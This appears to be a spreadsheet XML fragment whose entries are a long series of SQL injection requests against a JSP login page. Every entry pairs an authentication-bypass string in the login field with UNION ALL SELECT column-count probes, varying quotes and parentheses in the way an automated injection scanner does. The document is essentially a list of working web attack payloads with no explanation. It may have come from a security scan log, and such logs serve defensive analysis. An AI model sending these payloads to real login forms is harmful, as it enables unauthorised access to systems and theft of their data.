    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182,3182--and("sscj"like"sscj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselect1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125,1125--and("smzt"like"smzt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4753,4753,4753,4753,4753,4753,4753,4753,4753,4753,4753--and(("zzzy"like"zzzy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920,4920--and(("enov"like"enov</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967,8967--and(("wzoo"like"wzoo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991,3991--and(("yupj"like"yupj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581,5581--and(("cmas"like"cmas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890,1890--and(("uupa"like"uupa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4812,4812,4812,4812,4812,4812,4812,4812,4812,4812,4812,4812,4812,4812,4812,4812,4812--and(("rjqv"like"rjqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491,4491--and(("ezjb"like"ezjb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757,8757--and(("kuot"like"kuot</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselect822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822,822--and(("ybqb"like"ybqb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4937,4937,4937,4937,4937,4937,4937,4937,4937,4937,4937--and((("ajnn"like"ajnn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081,6081--and((("jnst"like"jnst</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522,6522--and((("hvpq"like"hvpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4102,4102,4102,4102,4102,4102,4102,4102,4102,4102,4102,4102,4102,4102--and((("ojul"like"ojul</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4216,4216,4216,4216,4216,4216,4216,4216,4216,4216,4216,4216,4216,4216,4216--and((("haoj"like"haoj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7931,7931,7931,7931,7931,7931,7931,7931,7931,7931,7931,7931,7931,7931,7931,7931--and((("zjpc"like"zjpc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4248,4248,4248,4248,4248,4248,4248,4248,4248,4248,4248,4248,4248,4248,4248,4248,4248--and((("ffjg"like"ffjg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100,4100--and((("mkve"like"mkve</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939,7939--and((("blan"like"blan</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselect4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149,4149--and((("ibrq"like"ibrq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3205,3205,3205,3205,3205,3205,3205,3205,3205,3205,3205--and"kiiv"like"kiiv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect735,735,735,735,735,735,735,735,735,735,735,735--and"qrbc"like"qrbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2978,2978,2978,2978,2978,2978,2978,2978,2978,2978,2978,2978,2978--and"japi"like"japi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593,3593--and"loeb"like"loeb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5173,5173,5173,5173,5173,5173,5173,5173,5173,5173,5173,5173,5173,5173,5173--and"pqtj"like"pqtj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7089,7089,7089,7089,7089,7089,7089,7089,7089,7089,7089,7089,7089,7089,7089,7089--and"smyt"like"smyt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1876,1876,1876,1876,1876,1876,1876,1876,1876,1876,1876,1876,1876,1876,1876,1876,1876--and"jyjb"like"jyjb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793,1793--and"wrsa"like"wrsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152,1152--and"lqgy"like"lqgy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537,3537--and"lmas"like"lmas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect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--and(6529=6529</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(7296=7296</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(5138=5138</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(8503=8503</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(6341=6341</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(6472=6472</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(8761=8761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--and(4580=4580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--and(6597=6597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--and(8813=8813</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8961=8961</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((5441=5441</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8321=8321</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((4956=4956</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8112=8112</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((3419=3419</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((99=9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--and((2363=2363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--and((5419=541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--and((4605=4605</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((3105=3105</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((414=414</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((486=486</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((8025=8025</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((9225=9225</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((3284=3284</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((3282=3282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--and(((8337=8337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--and(((3329=3329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--and(((5006=5006</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect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--and('sgsg'='sgsg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('lmet'='lmet</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('pamb'='pamb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('dsno'='dsno</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('utcs'='utcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('iehq'='iehq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('golb'='golb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--and('jrtr'='jrtr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--and('sqwa'='sqwa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--and('pirm'='pirm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('dvyv'='dvyv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('nmzw'='nmzw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('hacy'='hacy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ixop'='ixop</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('flzh'='flzh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('voib'='voib</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('rbta'='rbta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--and(('bpvf'='bpvf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--and(('pozo'='pozo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--and(('wegb'='wegb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('eeln'='eeln</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('tmyk'='tmyk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('xkgb'='xkgb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('aohp'='aohp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('gvgx'='gvgx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('yqhm'='yqhm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('rgeo'='rgeo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--and((('mibn'='mibn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--and((('clql'='clql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--and((('dksi'='dksi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'bqal'='bqal</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'rtid'='rtid</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'osto'='osto</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'xwvn'='xwvn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ktoj'='ktoj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'iyed'='iyed</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'osro'='osro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--and'cjbg'='cjbg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--and'fpnj'='fpnj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--and'aohm'='aohm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('xkhj'like'xkhj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ript'like'ript</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('qgbz'like'qgbz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ydqg'like'ydqg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('hjjp'like'hjjp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('tysa'like'tysa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ulju'like'ulju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--and('lwyl'like'lwyl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--and('ikzb'like'ikzb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--and('trbb'like'trbb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('tmvd'like'tmvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('tupu'like'tupu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ixqe'like'ixqe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('hcpt'like'hcpt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('unrl'like'unrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('zygo'like'zygo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('vhpz'like'vhpz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--and(('vfah'like'vfah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--and(('jwdx'like'jwdx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--and(('nwai'like'nwai</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('jswv'like'jswv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('onvo'like'onvo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('algp'like'algp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('begi'like'begi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('sucv'like'sucv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('ymcf'like'ymcf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('yksv'like'yksv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--and((('txsl'like'txsl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--and((('imdz'like'imdz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--and((('nhvn'like'nhvn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'qxmy'like'qxmy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'zwhn'like'zwhn</t>
  </si>
